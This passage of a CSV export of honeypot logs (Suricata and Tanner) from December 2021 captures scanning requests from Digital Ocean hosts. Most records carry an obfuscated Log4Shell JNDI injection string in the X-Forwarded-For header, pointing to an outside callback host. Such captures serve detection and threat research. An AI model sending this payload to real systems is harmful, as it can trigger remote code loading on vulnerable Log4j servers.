Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",23684375,,"{""timestamp"":""2021-12-15T10:14:25.603459+0000"",""flow_id"":778633547479960,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.203.13.133"",""src_port"":45508,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.203.13.133",45508,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.603459+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T10:14:25.603Z",1,QIWWvX0B6VkG8jKzEdea,"logstash-suricata-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.203.13.133",45508,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",ac56291293ec6186a86afc3495db6b7f,"[]",9652,CLOSED,false,0,,,,,,,778633547479960,Forthnet,1241,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,a881cb080aae,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",23685017,,"{""timestamp"":""2021-12-15T10:14:25.603459+0000"",""flow_id"":778633547479960,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.203.13.133"",""dest_port"":45508,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""ac56291293ec6186a86afc3495db6b7f"",""stored"":false,""size"":9652,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.603459+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:14:25.535Z",1,DYWWvX0B6VkG8jKzDNdN,"logstash-tanner-2021.12.15",,"_doc","2024c884-a194-4633-950c-0c62617862fb",a881cb080aae,"7f0af17a-0900-4f3b-847c-41a3701bec36",a881cb080aae,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"159.203.13.133","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",a881cb080aae,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",28505,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""cf0d8729-adb3-470a-b138-48afff4aada4"", ""peer"": {""ip"": ""159.203.13.133"", ""port"": 45508}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""80f29291-944e-47c4-94ca-29a51e906455""}}}, ""timestamp"": ""2021-12-15T10:14:25.535412""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","80f29291-944e-47c4-94ca-29a51e906455","0.6.0",,,,,,,,,,,,,,,,,,"159.203.13.133",45508,,,,,,,,,200,,,giantmole,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:25.535412",,,,,,,,,Tanner,,,"cf0d8729-adb3-470a-b138-48afff4aada4",
"2021-12-15T10:14:17.710Z",1,sSOVvX0B5e7x5EYn8ghV,"logstash-suricata-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.151.200",57206,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png",false,"PNG image data, 188 x 188, 8-bit/color RGB, non-interlaced",65ea4969927dc73078f86ef7d1581093,"[]",5662,CLOSED,false,2,,,,,,,2031226398981885,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,cc192bc8c472,,,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5662,"HTTP/1.1",200,"/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",43148480,,"{""timestamp"":""2021-12-15T10:14:17.710863+0000"",""flow_id"":2031226398981885,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.151.200"",""dest_port"":57206,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5662},""app_proto"":""http"",""fileinfo"":{""filename"":""/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png"",""sid"":[],""magic"":""PNG image data, 188 x 188, 8-bit/color RGB, non-interlaced"",""gaps"":false,""state"":""CLOSED"",""md5"":""65ea4969927dc73078f86ef7d1581093"",""stored"":false,""size"":5662,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:14:17.710863+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:14:17.710Z",1,sCOVvX0B5e7x5EYn8ghV,"logstash-suricata-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2031226398981885,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.151.200","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,cc192bc8c472,"gzip, deflate",,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5662,"HTTP/1.1",200,"/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",43147742,,"{""timestamp"":""2021-12-15T10:14:17.710863+0000"",""flow_id"":2031226398981885,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.151.200"",""src_port"":57206,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5662}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.151.200",57206,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:17.710863+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T10:14:17.621Z",1,qIWVvX0B6VkG8jKz8tVe,"logstash-tanner-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"c83c0473-d7ec-490a-9aa5-a83be9b2c40d",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.151.200","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=c83c0473-d7ec-490a-9aa5-a83be9b2c40d",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",cc192bc8c472,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",46173,,"{""method"": ""GET"", ""path"": ""/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=c83c0473-d7ec-490a-9aa5-a83be9b2c40d""}, ""uuid"": ""34ab2d23-6507-4c8d-988a-924b97e5c33c"", ""peer"": {""ip"": ""138.197.151.200"", ""port"": 57206}, ""status"": 200, ""cookies"": {""sess_uuid"": ""c83c0473-d7ec-490a-9aa5-a83be9b2c40d""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""feb19252-95ec-4435-98e5-a296c65e214a""}}}, ""timestamp"": ""2021-12-15T10:14:17.621919""}",,,,,,GET,,,,,,"/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png",,,,,,,,,,,index,1,1,"0.6.0","feb19252-95ec-4435-98e5-a296c65e214a","0.6.0",,,,,,,,,,,,,,,,,,"138.197.151.200",57206,,,,,,,,,200,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:17.621919",,,,,,,,,Tanner,,,"34ab2d23-6507-4c8d-988a-924b97e5c33c",
"2021-12-15T10:14:17.463Z",1,riOVvX0B5e7x5EYn8ghV,"logstash-suricata-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2031226398981885,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.151.200","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,cc192bc8c472,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10802,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",43146223,,"{""timestamp"":""2021-12-15T10:14:17.463880+0000"",""flow_id"":2031226398981885,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.151.200"",""src_port"":57206,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":10802}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.151.200",57206,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:17.463880+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T10:14:17.463Z",1,ryOVvX0B5e7x5EYn8ghV,"logstash-suricata-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.151.200",57206,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, Unicode text, UTF-8 text, with very long lines (1105)",078e9a9b315d76ae99d7449aa8182fee,"[]",10802,CLOSED,false,1,,,,,,,2031226398981885,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,cc192bc8c472,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10802,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",43146875,,"{""timestamp"":""2021-12-15T10:14:17.463880+0000"",""flow_id"":2031226398981885,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.151.200"",""dest_port"":57206,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":10802},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (1105)"",""gaps"":false,""state"":""CLOSED"",""md5"":""078e9a9b315d76ae99d7449aa8182fee"",""stored"":false,""size"":10802,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:14:17.463880+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:14:17.379Z",1,p4WVvX0B6VkG8jKz8tVe,"logstash-tanner-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"c83c0473-d7ec-490a-9aa5-a83be9b2c40d",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.151.200","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=c83c0473-d7ec-490a-9aa5-a83be9b2c40d",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",cc192bc8c472,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",45289,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=c83c0473-d7ec-490a-9aa5-a83be9b2c40d""}, ""uuid"": ""34ab2d23-6507-4c8d-988a-924b97e5c33c"", ""peer"": {""ip"": ""138.197.151.200"", ""port"": 57206}, ""status"": 200, ""cookies"": {""sess_uuid"": ""c83c0473-d7ec-490a-9aa5-a83be9b2c40d""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""feb19252-95ec-4435-98e5-a296c65e214a""}}}, ""timestamp"": ""2021-12-15T10:14:17.379761""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","feb19252-95ec-4435-98e5-a296c65e214a","0.6.0",,,,,,,,,,,,,,,,,,"138.197.151.200",57206,,,,,,,,,200,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:17.379761",,,,,,,,,Tanner,,,"34ab2d23-6507-4c8d-988a-924b97e5c33c",
"2021-12-15T10:14:16.965Z",1,PLeVvX0BCXMCNTQL8mNV,"logstash-suricata-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2031226398981885,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.151.200","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,cc192bc8c472,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10803,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",43144766,,"{""timestamp"":""2021-12-15T10:14:16.965404+0000"",""flow_id"":2031226398981885,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.151.200"",""src_port"":57206,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10803}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.151.200",57206,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:14:16.965404+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T10:14:16.965Z",1,rSOVvX0B5e7x5EYn8ghV,"logstash-suricata-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.151.200",57206,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text",c62e5675e85098667aceb6d9c154af41,"[]",10803,CLOSED,false,0,,,,,,,2031226398981885,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,cc192bc8c472,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10803,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",43145407,,"{""timestamp"":""2021-12-15T10:14:16.965404+0000"",""flow_id"":2031226398981885,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.151.200"",""dest_port"":57206,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10803},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text"",""gaps"":false,""state"":""CLOSED"",""md5"":""c62e5675e85098667aceb6d9c154af41"",""stored"":false,""size"":10803,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:14:16.965404+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:14:16.851Z",1,poWVvX0B6VkG8jKz8tVe,"logstash-tanner-2021.12.15",,"_doc","ad067808-277d-4da4-a48b-94c98a10d704",cc192bc8c472,"44c21705-a593-4884-9d8a-cb7e17e8bc5e",cc192bc8c472,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.151.200","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",cc192bc8c472,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",44510,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""34ab2d23-6507-4c8d-988a-924b97e5c33c"", ""peer"": {""ip"": ""138.197.151.200"", ""port"": 57206}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""c83c0473-d7ec-490a-9aa5-a83be9b2c40d""}}}, ""timestamp"": 